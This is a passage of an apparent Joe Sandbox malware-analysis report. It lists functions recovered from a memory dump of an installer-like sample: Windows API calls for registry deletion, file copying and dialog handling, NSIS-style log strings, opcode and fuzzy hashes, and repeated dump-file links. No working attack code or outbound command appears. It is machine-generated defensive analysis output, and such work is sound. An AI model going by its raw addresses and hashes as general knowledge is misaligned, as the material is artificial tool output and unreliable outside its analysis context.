                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                  • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                  • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                  • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                                  Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                  • API String ID: 1697273262-1764544995
                                                                                                                                                                                  • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                  • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                  • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                  Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                  • String ID: $@rD
                                                                                                                                                                                  • API String ID: 3748168415-881980237
                                                                                                                                                                                  • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                  • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                  • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                                  Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                    • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                    • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                  • API String ID: 2577523808-3778932970
                                                                                                                                                                                  • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                  • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                                  • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                  • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                  Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrcatwsprintf
                                                                                                                                                                                  • String ID: %02x%c$...
                                                                                                                                                                                  • API String ID: 3065427908-1057055748
                                                                                                                                                                                  • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                  • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                  • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                  Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                  • API String ID: 2266616436-4211696005
                                                                                                                                                                                  • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                  • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                  Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                  • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1599320355-0
                                                                                                                                                                                  • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                  • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                  • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                  Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                  • String ID: Version
                                                                                                                                                                                  • API String ID: 512980652-315105994
                                                                                                                                                                                  • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                  • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                  Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                                                  • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                  • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                                  • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                                  Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2883127279-0
                                                                                                                                                                                  • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                  • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
